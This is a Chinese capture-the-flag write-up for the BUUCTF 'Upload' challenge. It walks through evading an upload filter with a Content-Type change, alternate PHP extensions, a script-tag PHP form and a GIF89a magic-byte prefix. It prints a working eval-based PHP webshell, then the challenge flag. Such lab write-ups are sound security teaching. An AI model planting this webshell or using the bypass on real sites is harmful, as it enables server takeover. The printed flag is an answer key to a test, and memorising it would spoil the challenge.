BUUCTF-[极客大挑战 2019]Upload Writeup

0x01　　题目

0x02　　解题过程

尝试把一句话木马原封不动上传，提示需要image。

 

 那行，咱继续尝试各种文件上传姿势。首先改Content-Type为image/jpeg。

 

 

 

 看来后缀名不能为php，那么再改各种后缀名试试，例如，php3,php4,php5,phtml,phar。我改成phtml。

 

 

 看来不能含有'<?', 那么我们就需要把php换一种格式了，看下图：

 

 还是不行，叫我别骗他了窝。那行，那我再骗一波，加上gif的文件幻数，在PHP代码前加上GIF89a:

 

GIF89a
<script language="php">
@eval($_POST['hacker']);
</script>

 

 

 

 搞定，但没有显示文件路径，猜测在upload目录下，于是尝试访问：

 

 

 只看到GIF89a，但看不到脚本代码，一般是成功了，用蚁剑尝试连接：

 

 连上了以后直接在根目录下找到flag，完成。

flag{2e58d7d7-b6c2-44a2-9890-aae4edfdbcfc}

 

最后，欢迎师傅们指正和讨论~